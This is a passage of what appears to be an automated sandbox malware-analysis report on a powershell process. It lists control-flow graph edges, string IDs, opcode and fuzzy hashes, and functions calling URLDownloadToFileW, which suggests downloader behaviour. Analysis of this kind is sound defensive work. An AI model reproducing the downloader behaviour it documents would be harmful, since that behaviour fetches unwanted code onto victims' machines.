73d2011-73d2020 92->94 103 73d2005-73d200f 93->103 104 73d2003 93->104 94->8 112 73d2026-73d2044 94->112 95->26 102 73d2224-73d225b 95->102 96->86 97->86 115 73d2558-73d257e 98->115 116 73d2585-73d25b4 98->116 123 73d225d-73d2263 102->123 124 73d2275-73d227c 102->124 103->94 104->94 112->8 125 73d204a-73d206f 112->125 115->116 126 73d25ed-73d25f7 116->126 127 73d25b6-73d25d3 116->127 131 73d2265 123->131 132 73d2267-73d2273 123->132 133 73d227e-73d2284 124->133 134 73d2294-73d22d5 124->134 125->8 151 73d2075-73d207c 125->151 128 73d25f9-73d25fd 126->128 129 73d2600-73d2606 126->129 144 73d263d-73d2642 127->144 145 73d25d5-73d25e7 127->145 135 73d260c-73d2618 129->135 136 73d2608-73d260a 129->136 131->124 132->124 137 73d2288-73d2292 133->137 138 73d2286 133->138 142 73d261a-73d263a 135->142 136->142 137->134 138->134 144->145 145->126 152 73d207e-73d2099 151->152 153 73d20c2-73d20f5 151->153 157 73d209b-73d20a1 152->157 158 73d20b3-73d20b7 152->158 163 73d20fc-73d2105 153->163 159 73d20a5-73d20b1 157->159 160 73d20a3 157->160 162 73d20be-73d20c0 158->162 159->158 160->158 162->163
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq
                                                              • API String ID: 0-2296240322
                                                              • Opcode ID: d23b56d805a94a9aa843f41106e8ca31e25ac4681ddc1d3ffe93a4173d07a109
                                                              • Instruction ID: 263f7b7bf04df79b88f986d7e79df056cdb6a26fe7a6a00659b016b54483b491
                                                              • Opcode Fuzzy Hash: d23b56d805a94a9aa843f41106e8ca31e25ac4681ddc1d3ffe93a4173d07a109
                                                              • Instruction Fuzzy Hash: BF1228F27042169FEB158B68A81077BBBA6BFD5311F14C46AD909CF281DB31CD82C7A1
                                                              Function 073D4610 Relevance: 2.9, Strings: 2, Instructions: 439COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 169 73d4610-73d463b 170 73d4641-73d4646 169->170 171 73d4af2-73d4b25 169->171 172 73d465e-73d4663 170->172 173 73d4648-73d464e 170->173 180 73d4b35 171->180 181 73d4b27-73d4b33 171->181 177 73d4665-73d4671 172->177 178 73d4673 172->178 174 73d4650 173->174 175 73d4652-73d465c 173->175 174->172 175->172 179 73d4675-73d4677 177->179 178->179 183 73d467d-73d4687 179->183 184 73d4a93-73d4a9d 179->184 182 73d4b37-73d4b39 180->182 181->182 188 73d4b7b-73d4b85 182->188 189 73d4b3b-73d4b42 182->189 183->171 190 73d468d-73d4692 183->190 186 73d4a9f-73d4aa8 184->186 187 73d4aab-73d4ab1 184->187 191 73d4ab7-73d4ac3 187->191 192 73d4ab3-73d4ab5 187->192 196 73d4b8e-73d4b94 188->196 197 73d4b87-73d4b8b 188->197 189->188 193 73d4b44-73d4b61 189->193 194 73d46aa-73d46b8 190->194 195 73d4694-73d469a 190->195 198 73d4ac5-73d4aef 191->198 192->198 207 73d4bc9-73d4bce 193->207 208 73d4b63-73d4b75 193->208 194->184 211 73d46be-73d46dd 194->211 199 73d469c 195->199 200 73d469e-73d46a8 195->200 201 73d4b9a-73d4ba6 196->201 202 73d4b96-73d4b98 196->202 199->194 200->194 206 73d4ba8-73d4bc6 201->206 202->206 207->208 208->188 211->184 219 73d46e3-73d46ed 211->219 219->171 220 73d46f3-73d46f8 219->220 221 73d46fa-73d4700 220->221 222 73d4710-73d4714 220->222 223 73d4704-73d470e 221->223 224 73d4702 221->224 222->184 225 73d471a-73d471e 222->225 223->222 224->222 225->184 226 73d4724-73d4728 225->226 226->184 228 73d472e-73d473e 226->228 229 73d4744-73d476b 228->229 230 73d47c6-73d4815 228->230 235 73d476d-73d4773 229->235 236 73d4785-73d47b3 229->236 247 73d481c-73d482f 230->247 237 73d4775 235->237 238 73d4777-73d4783 235->238 245 73d47b5-73d47b7 236->245 246 73d47c1-73d47c4 236->246 237->236 238->236 245->246 246->247 248 73d4835-73d485c 247->248 249 73d48b7-73d4906 247->249 254 73d485e-73d4864 248->254 255 73d4876-73d48a4 248->255 266 73d490d-73d4920 249->266 256 73d4868-73d4874 254->256 257 73d4866 254->257 264 73d48a6-73d48a8 255->264 265 73d48b2-73d48b5 255->265 256->255 257->255 264->265 265->266 267 73d49a8-73d49f7 266->267 268 73d4926-73d494d 266->268 285 73d49fe-73d4a2c 267->285 273 73d494f-73d4955 268->273 274 73d4967-73d4995 268->274 275 73d4959-73d4965 273->275 276 73d4957 273->276 283 73d4997-73d4999 274->283 284 73d49a3-73d49a6 274->284 275->274 276->274 283->284 284->285 290 73d4a2f call c97e89 285->290 291 73d4a2f call c97e69 285->291 292 73d4a2f call c97da8 285->292 293 73d4a2f call c97b81 285->293 294 73d4a2f call c97ba1 285->294 295 73d4a2f call c97cc1 285->295 296 73d4a2f call c97c81 285->296 297 73d4a2f call c97c45 285->297 298 73d4a2f call c97a18 285->298 299 73d4a2f call c91bf8 285->299 300 73d4a2f call c97af1 285->300 301 73d4a2f call c97b71 285->301 302 73d4a2f call c97c71 285->302 303 73d4a2f call c979f7 285->303 288 73d4a34-73d4a90 290->288 291->288 292->288 293->288 294->288 295->288 296->288 297->288 298->288 299->288 300->288 301->288 302->288 303->288
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPdq$tPdq
                                                              • API String ID: 0-1003797653
                                                              • Opcode ID: 59948c3938ed262f696fd57701672ed2f57d2ff0bbf613b1e60219064166f971
                                                              • Instruction ID: 2c7f612fee98ff68590d4c466f97f01764ce4ed008b949a3b9d74cd43c400709
                                                              • Opcode Fuzzy Hash: 59948c3938ed262f696fd57701672ed2f57d2ff0bbf613b1e60219064166f971
                                                              • Instruction Fuzzy Hash: 1FF1D4B2B00245AFDB149F68D811B6ABBE6EFC9310F248469ED099B390DB71DD41CB91
                                                              Function 073D04F8 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 304 73d04f8-73d050a 305 73d05ca-73d05fd 304->305 306 73d0510-73d0521 304->306 309 73d05ff-73d063e 305->309 310 73d066b-73d0675 305->310 311 73d053b-73d0558 306->311 312 73d0523-73d0529 306->312 333 73d06bb-73d06c0 309->333 334 73d0640-73d064e 309->334 313 73d0677-73d067d 310->313 314 73d0680-73d0686 310->314 311->305 322 73d055a-73d057c 311->322 315 73d052d-73d0539 312->315 316 73d052b 312->316 318 73d068c-73d0698 314->318 319 73d0688-73d068a 314->319 315->311 316->311 323 73d069a-73d06b8 318->323 319->323 328 73d057e-73d0584 322->328 329 73d0596-73d05ae 322->329 331 73d0588-73d0594 328->331 332 73d0586 328->332 337 73d05bc-73d05c7 329->337 338 73d05b0-73d05b2 329->338 331->329 332->329 333->334 342 73d0656-73d0665 334->342 338->337 342->310
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPdq$tPdq
                                                              • API String ID: 0-1003797653
                                                              • Opcode ID: 4c26a7be3f5999b865908f25100c6ed0cfd02ee5069b1a8245ee23e93d19a4bc
                                                              • Instruction ID: bb4e998eb014d9a613b276257670de17d69068fb71e4984d49a89292ce9cc7e7
                                                              • Opcode Fuzzy Hash: 4c26a7be3f5999b865908f25100c6ed0cfd02ee5069b1a8245ee23e93d19a4bc
                                                              • Instruction Fuzzy Hash: E8515AF2704214ABEB145B68981076EBBE6EF85B10F54845AE94CDF3C1CB31DD45C7A1
                                                              Function 00C91BF8 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 415 c91bf8-c97e52 418 c97e5d-c97e63 415->418 419 c97e54-c97e5a 415->419 420 c97e71-c97ea6 URLDownloadToFileW 418->420 421 c97e65-c97e6e 418->421 419->418 423 c97ea8-c97eae 420->423 424 c97eaf-c97ec3 420->424 421->420 423->424
                                                              APIs
                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 00C97E99
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813554454.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: e1b95677fcb7cb92a3f1970460ebd9f22ec284122954d7ab92adc5a105269da4
                                                              • Instruction ID: 5c732140670985c383165213d3d97592c5d970d71c0cbc37780d4859cbbea7fa
                                                              • Opcode Fuzzy Hash: e1b95677fcb7cb92a3f1970460ebd9f22ec284122954d7ab92adc5a105269da4
                                                              • Instruction Fuzzy Hash: 732117B5D11619EFCF04DF99D988ADEFBF4FB48310F108159E918A7250D374AA54CBA0
                                                              Function 00C97E69 Relevance: 1.5, APIs: 1, Instructions: 31filenetworkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 426 c97e69-c97e7a 428 c97e7c-c97e83 426->428 429 c97e84-c97ea6 URLDownloadToFileW 426->429 428->429 430 c97ea8-c97eae 429->430 431 c97eaf-c97ec3 429->431 430->431
                                                              APIs
                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 00C97E99
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813554454.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: 2a6371b8cb558d99a14e37ba541a7ca30f83da4620d696541a3b22200c919e19
                                                              • Instruction ID: edeb837bf9443b24c02639f76b199277f51ad150f290eea088192266ef236be5
                                                              • Opcode Fuzzy Hash: 2a6371b8cb558d99a14e37ba541a7ca30f83da4620d696541a3b22200c919e19
                                                              • Instruction Fuzzy Hash: FDF09AB2915608EEDF00EF99D8487CDFBB0FF48324F188689E52966181D3791A58DB61
                                                              Function 00C97E89 Relevance: 1.5, APIs: 1, Instructions: 20filenetworkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 433 c97e89-c97ea6 URLDownloadToFileW 434 c97ea8-c97eae 433->434 435 c97eaf-c97ec3 433->435 434->435
                                                              APIs
                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 00C97E99
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813554454.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: 528b63f74194eaec70ef48a0677805cbb7e859d5ebb187d08eea0e835abba473
                                                              • Instruction ID: f978652799a5582bf5717b403055d38cafeab7c0115558d33224b0ccf1f9a3fe
                                                              • Opcode Fuzzy Hash: 528b63f74194eaec70ef48a0677805cbb7e859d5ebb187d08eea0e835abba473
                                                              • Instruction Fuzzy Hash: E5E09AB280A7489ECF00DF99E4083CCFBB0AB59324F24818AD018A3240C3751AA8CBA1
                                                              Function 073D45F4 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 437 73d45f4-73d463b 439 73d4641-73d4646 437->439 440 73d4af2-73d4b25 437->440 441 73d465e-73d4663 439->441 442 73d4648-73d464e 439->442 449 73d4b35 440->449 450 73d4b27-73d4b33 440->450 446 73d4665-73d4671 441->446 447 73d4673 441->447 443 73d4650 442->443 444 73d4652-73d465c 442->444 443->441 444->441 448 73d4675-73d4677 446->448 447->448 452 73d467d-73d4687 448->452 453 73d4a93-73d4a9d 448->453 451 73d4b37-73d4b39 449->451 450->451 457 73d4b7b-73d4b85 451->457 458 73d4b3b-73d4b42 451->458 452->440 459 73d468d-73d4692 452->459 455 73d4a9f-73d4aa8 453->455 456 73d4aab-73d4ab1 453->456 460 73d4ab7-73d4ac3 456->460 461 73d4ab3-73d4ab5 456->461 465 73d4b8e-73d4b94 457->465 466 73d4b87-73d4b8b 457->466 458->457 462 73d4b44-73d4b61 458->462 463 73d46aa-73d46b8 459->463 464 73d4694-73d469a 459->464 467 73d4ac5-73d4aef 460->467 461->467 476 73d4bc9-73d4bce 462->476 477 73d4b63-73d4b75 462->477 463->453 480 73d46be-73d46dd 463->480 468 73d469c 464->468 469 73d469e-73d46a8 464->469 470 73d4b9a-73d4ba6 465->470 471 73d4b96-73d4b98 465->471 468->463 469->463 475 73d4ba8-73d4bc6 470->475 471->475 476->477 477->457 480->453 488 73d46e3-73d46ed 480->488 488->440 489 73d46f3-73d46f8 488->489 490 73d46fa-73d4700 489->490 491 73d4710-73d4714 489->491 492 73d4704-73d470e 490->492 493 73d4702 490->493 491->453 494 73d471a-73d471e 491->494 492->491 493->491 494->453 495 73d4724-73d4728 494->495 495->453 497 73d472e-73d473e 495->497 498 73d4744-73d476b 497->498 499 73d47c6-73d4815 497->499 504 73d476d-73d4773 498->504 505 73d4785-73d47b3 498->505 516 73d481c-73d482f 499->516 506 73d4775 504->506 507 73d4777-73d4783 504->507 514 73d47b5-73d47b7 505->514 515 73d47c1-73d47c4 505->515 506->505 507->505 514->515 515->516 517 73d4835-73d485c 516->517 518 73d48b7-73d4906 516->518 523 73d485e-73d4864 517->523 524 73d4876-73d48a4 517->524 535 73d490d-73d4920 518->535 525 73d4868-73d4874 523->525 526 73d4866 523->526 533 73d48a6-73d48a8 524->533 534 73d48b2-73d48b5 524->534 525->524 526->524 533->534 534->535 536 73d49a8-73d49f7 535->536 537 73d4926-73d494d 535->537 554 73d49fe-73d4a2c 536->554 542 73d494f-73d4955 537->542 543 73d4967-73d4995 537->543 544 73d4959-73d4965 542->544 545 73d4957 542->545 552 73d4997-73d4999 543->552 553 73d49a3-73d49a6 543->553 544->543 545->543 552->553 553->554 559 73d4a2f call c97e89 554->559 560 73d4a2f call c97e69 554->560 561 73d4a2f call c97da8 554->561 562 73d4a2f call c97b81 554->562 563 73d4a2f call c97ba1 554->563 564 73d4a2f call c97cc1 554->564 565 73d4a2f call c97c81 554->565 566 73d4a2f call c97c45 554->566 567 73d4a2f call c97a18 554->567 568 73d4a2f call c91bf8 554->568 569 73d4a2f call c97af1 554->569 570 73d4a2f call c97b71 554->570 571 73d4a2f call c97c71 554->571 572 73d4a2f call c979f7 554->572 557 73d4a34-73d4a90 559->557 560->557 561->557 562->557 563->557 564->557 565->557 566->557 567->557 568->557 569->557 570->557 571->557 572->557
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPdq
                                                              • API String ID: 0-2402691438
                                                              • Opcode ID: 62473ae62eac97c436ba593759e1a575a8fa08b683773c28152afffac8996266
                                                              • Instruction ID: 3435cda7976d6ebf3aabe67d208e83c01f9230f1b10eefc2aeabc5993097ea5a
                                                              • Opcode Fuzzy Hash: 62473ae62eac97c436ba593759e1a575a8fa08b683773c28152afffac8996266
                                                              • Instruction Fuzzy Hash: 1391D3F2A002459BEB24CF58D541B6ABBB6FF88710F588459EC19AB390D771ED41CB90
                                                              Function 073D1F24 Relevance: .1, Instructions: 118COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 741 73d1f24-73d1f65 743 73d2158-73d21a2 741->743 744 73d1f6b-73d1f70 741->744 752 73d21a8-73d21ad 743->752 753 73d2326-73d236a 743->753 745 73d1f88-73d1f8c 744->745 746 73d1f72-73d1f78 744->746 750 73d2108-73d2112 745->750 751 73d1f92-73d1f94 745->751 748 73d1f7c-73d1f86 746->748 749 73d1f7a 746->749 748->745 749->745 754 73d2114-73d211d 750->754 755 73d2120-73d2126 750->755 756 73d1fa4 751->756 757 73d1f96-73d1fa2 751->757 758 73d21af-73d21b5 752->758 759 73d21c5-73d21c9 752->759 771 73d2480-73d24b5 753->771 772 73d2370-73d2375 753->772 760 73d212c-73d2138 755->760 761 73d2128-73d212a 755->761 762 73d1fa6-73d1fa8 756->762 757->762 765 73d21b9-73d21c3 758->765 766 73d21b7 758->766 767 73d21cf-73d21d1 759->767 768 73d22d8-73d22e2 759->768 769 73d213a-73d2155 760->769 761->769 762->750 770 73d1fae-73d1fcd 762->770 765->759 766->759 775 73d21e1 767->775 776 73d21d3-73d21df 767->776 773 73d22ef-73d22f5 768->773 774 73d22e4-73d22ec 768->774 807 73d1fdd 770->807 808 73d1fcf-73d1fdb 770->808 796 73d24b7-73d24d9 771->796 797 73d24e3-73d24ed 771->797 778 73d238d-73d2391 772->778 779 73d2377-73d237d 772->779 781 73d22fb-73d2307 773->781 782 73d22f7-73d22f9 773->782 783 73d21e3-73d21e5 775->783 776->783 790 73d2397-73d2399 778->790 791 73d2432-73d243c 778->791 786 73d237f 779->786 787 73d2381-73d238b 779->787 788 73d2309-73d2323 781->788 782->788 783->768 789 73d21eb-73d220a 783->789 786->778 787->778 832 73d220c-73d2218 789->832 833 73d221a 789->833 794 73d23a9 790->794 795 73d239b-73d23a7 790->795 799 73d243e-73d2446 791->799 800 73d2449-73d244f 791->800 806 73d23ab-73d23ad 794->806 795->806 840 73d252d-73d2556 796->840 841 73d24db-73d24e0 796->841 802 73d24ef-73d24f4 797->802 803 73d24f7-73d24fd 797->803 810 73d2455-73d2461 800->810 811 73d2451-73d2453 800->811 813 73d24ff-73d2501 803->813 814 73d2503-73d250f 803->814 806->791 817 73d23b3-73d23b5 806->817 816 73d1fdf-73d1fe1 807->816 808->816 812 73d2463-73d247d 810->812 811->812 819 73d2511-73d252a 813->819 814->819 816->750 821 73d1fe7-73d1fee 816->821 822 73d23cf-73d23d6 817->822 823 73d23b7-73d23bd 817->823 821->743 834 73d1ff4-73d1ff9 821->834 828 73d23ee-73d242f 822->828 829 73d23d8-73d23de 822->829 825 73d23bf 823->825 826 73d23c1-73d23cd 823->826 825->822 826->822 838 73d23e0 829->838 839 73d23e2-73d23ec 829->839 837 73d221c-73d221e 832->837 833->837 835 73d1ffb-73d2001 834->835 836 73d2011-73d2020 834->836 845 73d2005-73d200f 835->845 846 73d2003 835->846 836->750 854 73d2026-73d2044 836->854 837->768 844 73d2224-73d225b 837->844 838->828 839->828 857 73d2558-73d257e 840->857 858 73d2585-73d25b4 840->858 865 73d225d-73d2263 844->865 866 73d2275-73d227c 844->866 845->836 846->836 854->750 867 73d204a-73d206f 854->867 857->858 868 73d25ed-73d25f7 858->868 869 73d25b6-73d25d3 858->869 873 73d2265 865->873 874 73d2267-73d2273 865->874 875 73d227e-73d2284 866->875 876 73d2294-73d22d5 866->876 867->750 893 73d2075-73d207c 867->893 870 73d25f9-73d25fd 868->870 871 73d2600-73d2606 868->871 886 73d263d-73d2642 869->886 887 73d25d5-73d25e7 869->887 877 73d260c-73d2618 871->877 878 73d2608-73d260a 871->878 873->866 874->866 879 73d2288-73d2292 875->879 880 73d2286 875->880 884 73d261a-73d263a 877->884 878->884 879->876 880->876 886->887 887->868 894 73d207e-73d2099 893->894 895 73d20c2-73d20f5 893->895 899 73d209b-73d20a1 894->899 900 73d20b3-73d20b7 894->900 905 73d20fc-73d2105 895->905 901 73d20a5-73d20b1 899->901 902 73d20a3 899->902 904 73d20be-73d20c0 900->904 901->900 902->900 904->905
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d85618ccf3a687f16053f7c40db1dd2796401e1a765c72575e0ce0c3da0b733
                                                              • Instruction ID: c9f9395e916ec35f3ec196554bdafdbf70410bfa1a6b9e335823f2eccd0352c3
                                                              • Opcode Fuzzy Hash: 7d85618ccf3a687f16053f7c40db1dd2796401e1a765c72575e0ce0c3da0b733
                                                              • Instruction Fuzzy Hash: D7411EF2B042029FEB10CF159E40B7E7BA5BF85214F558499D608DF291D731DD41CBA2
                                                              Function 00B9D01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813206093.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_b9d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2ef96e6ef92850939dbba0bdaeadbf6b6584972260f5dc1c9fc793a149907e2
                                                              • Instruction ID: 8b25c52920f2c207a0f7fb3f4d748eb8f08d48cca2e9534f15ea10bc3009a8bf
                                                              • Opcode Fuzzy Hash: f2ef96e6ef92850939dbba0bdaeadbf6b6584972260f5dc1c9fc793a149907e2
                                                              • Instruction Fuzzy Hash: E40126715093449AEB208B2ACCC4B67FFD8DF51325F18C5AAEC4C0B282C7799841C7B1
                                                              Function 00B9D006 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813206093.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_b9d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 439fd35de658c69eb6c5a3c5a80954ee6b521676755ab62a37cabe269fec4771
                                                              • Instruction ID: 8667f4fb93fc3043ce5a8930099524d1a0f32a33c3355e36e10b0c65bc01601f
                                                              • Opcode Fuzzy Hash: 439fd35de658c69eb6c5a3c5a80954ee6b521676755ab62a37cabe269fec4771
                                                              • Instruction Fuzzy Hash: 82015E6250E3C09FD7128B258CA4B62BFA4DF52224F1980DBE9888F1A3C2695848C772

                                                              Non-executed Functions

                                                              Function 073D15A8 Relevance: 9.2, Strings: 7, Instructions: 479COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq
                                                              • API String ID: 0-3419624917
                                                              • Opcode ID: a88034655a3fb0d3ac6535bc55bf32bf67678b9a41da0869e86eb5e5ac4c5aff
                                                              • Instruction ID: c3d388c0f7db0102b6eff263687e7ff88205383842971e11e42e21871cafb23c
                                                              • Opcode Fuzzy Hash: a88034655a3fb0d3ac6535bc55bf32bf67678b9a41da0869e86eb5e5ac4c5aff
                                                              • Instruction Fuzzy Hash: 0FF10AF2B0021A8FEB108A68E81077ABBE6AFD5311F15847ED909CB251DB31DD46C7D1
                                                              Function 073D3678 Relevance: 8.0, Strings: 6, Instructions: 496COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$tPdq$tPdq
                                                              • API String ID: 0-2375391490
                                                              • Opcode ID: 03ec1fff5a1977cb1a738197277bf961805155b6b30520e57721e119c86ca88e
                                                              • Instruction ID: 9e8c040acf217aebc167fcf4c7259ed30436ab52352c634c80c4e19dc1f89326
                                                              • Opcode Fuzzy Hash: 03ec1fff5a1977cb1a738197277bf961805155b6b30520e57721e119c86ca88e
                                                              • Instruction Fuzzy Hash: E7F117F2704216DFEB148B68A81177ABBE6AFC6311F18847ED509CB281DB31DD46C792
                                                              Function 073D3D30 Relevance: 5.3, Strings: 4, Instructions: 267COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq
                                                              • API String ID: 0-2296240322
                                                              • Opcode ID: 043091802183374e445ba4ef3f588e8fe6863f0c10c6e9ce2619f3af2617227a
                                                              • Instruction ID: cf349f5639bfb470404c50c31e2ba22afe720a6ae92bac4007bea1c7cfae1464
                                                              • Opcode Fuzzy Hash: 043091802183374e445ba4ef3f588e8fe6863f0c10c6e9ce2619f3af2617227a
                                                              • Instruction Fuzzy Hash: B59148F3B05249DFDB149B69E4106AABBF6EF89211F1484ABD44DCB281DB31CC41CB92
                                                              Function 073D3550 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $dq$$dq$$dq$$dq
                                                              • API String ID: 0-185584874
                                                              • Opcode ID: 3646592513f873938f62a98deba3f641678a9f641b8a748171ebe6f53120c5b8
                                                              • Instruction ID: 4e230d27aab7231d9aa2ac7288709cf6f9aac873e324eb541f49c2cc5bcc0885
                                                              • Opcode Fuzzy Hash: 3646592513f873938f62a98deba3f641678a9f641b8a748171ebe6f53120c5b8
                                                              • Instruction Fuzzy Hash: 27213AF2710206EBEB2495A9A840B37AA9B9BC1711F64843A950DCB3C1CF35CD418362
                                                              Function 073D0080 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1817483357.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_73d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq
                                                              • API String ID: 0-4229963660
                                                              • Opcode ID: 0f18163347fb826f45aed22adda4eeec245b9988cf734fc65fb305e69f62bc38
                                                              • Instruction ID: 6cf17140a7ddaa2d27c922a62a180b85977272a6fc61dfcb37f080d43e67ec40
                                                              • Opcode Fuzzy Hash: 0f18163347fb826f45aed22adda4eeec245b9988cf734fc65fb305e69f62bc38
                                                              • Instruction Fuzzy Hash: 5A01F2A171E3815FD72A42682C2012A2FB66FC3A10B6A40EBD484DB2D7CB244D05C3A3

                                                              Execution Graph

                                                              Execution Coverage:6.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:70.1%
                                                              Total number of Nodes:67
                                                              Total number of Limit Nodes:7
